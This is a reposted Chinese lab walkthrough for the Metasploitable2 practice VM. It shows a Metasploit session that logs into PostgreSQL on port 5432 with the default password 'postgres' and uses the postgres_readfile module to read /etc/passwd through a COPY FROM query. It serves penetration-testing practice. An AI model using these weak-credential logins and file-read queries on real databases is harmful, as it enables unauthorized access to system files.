Metasploitable2 - tcp port 5432 - postgres

来源:互联网 发布:网络计划名词解释 编辑:程序博客网 时间:2024/05/17 01:09

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL. Metasploit 默认后端使用的就是该数据库.


msf auxiliary(postgres_readfile) > show optionsModule options (auxiliary/admin/postgres/postgres_readfile):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   DATABASE  template1        yes       The database to authenticate against   PASSWORD                   no        The password for the specified username. Leave blank for a random password.   RFILE     /etc/passwd      yes       The remote file   RHOST                      yes       The target address   RPORT     5432             yes       The target port   USERNAME  postgres         yes       The username to authenticate as   VERBOSE   false            no        Enable verbose outputmsf auxiliary(postgres_readfile) > set RHOST 192.168.1.111RHOST => 192.168.1.111msf auxiliary(postgres_readfile) > set PASSWORD postgresPASSWORD => postgresmsf auxiliary(postgres_readfile) > runQuery Text: 'CREATE TEMP TABLE EAQkNVJNpCMqfQa (INPUT TEXT);      COPY EAQkNVJNpCMqfQa FROM '/etc/passwd';      SELECT * FROM EAQkNVJNpCMqfQa'

上面通过弱口令,可以登陆数据库.
0 0
原创粉丝点击